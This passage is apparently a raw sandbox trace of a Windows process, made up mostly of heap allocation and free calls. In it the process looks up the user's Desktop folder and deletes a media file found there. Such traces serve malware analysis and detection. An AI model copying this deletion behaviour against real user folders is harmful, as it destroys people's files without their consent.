Size=0x8) returned 0x2a72a58 [0086.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76ec8 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.430] CloseHandle (hObject=0x2c4) returned 1 [0086.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0086.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76ec8 | out: hHeap=0x2af0000) returned 1 [0086.433] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0086.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed9c0 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6de60 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dd48 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed978 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed690 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e068 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ded8 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebe30 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e590 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e978 | out: hHeap=0x2af0000) returned 1 [0086.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec250 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e6a8 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e680 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda38 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dd70 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dfc8 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec058 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e7e8 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e748 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e770 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0086.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e6d0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed630 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed618 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dd20 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d9d8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec208 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e6f8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e7c0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebec0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e9f0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e928 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebef0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e630 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e5e0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed738 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed870 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75498 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed6c0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed600 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed8d0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed798 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed708 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed7e0 | out: hHeap=0x2af0000) returned 1 [0086.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed7f8 | out: hHeap=0x2af0000) returned 1 [0086.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed8b8 | out: hHeap=0x2af0000) returned 1 [0086.437] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0086.437] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.437] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0086.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0086.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0086.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75df8 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f9c0 [0086.438] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-yB2WD9ZHipl10.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\-yB2WD9ZHipl10.mkv", lpFilePart=0x8cedf4*="-yB2WD9ZHipl10.mkv") returned 0x2a [0086.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f9c0 | out: hHeap=0x2af0000) returned 1 [0086.438] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-yB2WD9ZHipl10.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\-yb2wd9zhipl10.mkv")) returned 0x20 [0086.438] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\-yB2WD9ZHipl10.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 0x9a3e40 [0086.439] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-yB2WD9ZHipl10.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\-yb2wd9zhipl10.mkv")) returned 1 [0086.440] FindNextFileW (in: hFindFile=0x9a3e40, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 0 [0086.440] FindClose (in: hFindFile=0x9a3e40 | out: hFindFile=0x9a3e40) returned 1 [0086.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75df8 | out: hHeap=0x2af0000) returned 1 [0086.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.441] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0086.441] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0086.441] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0086.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: 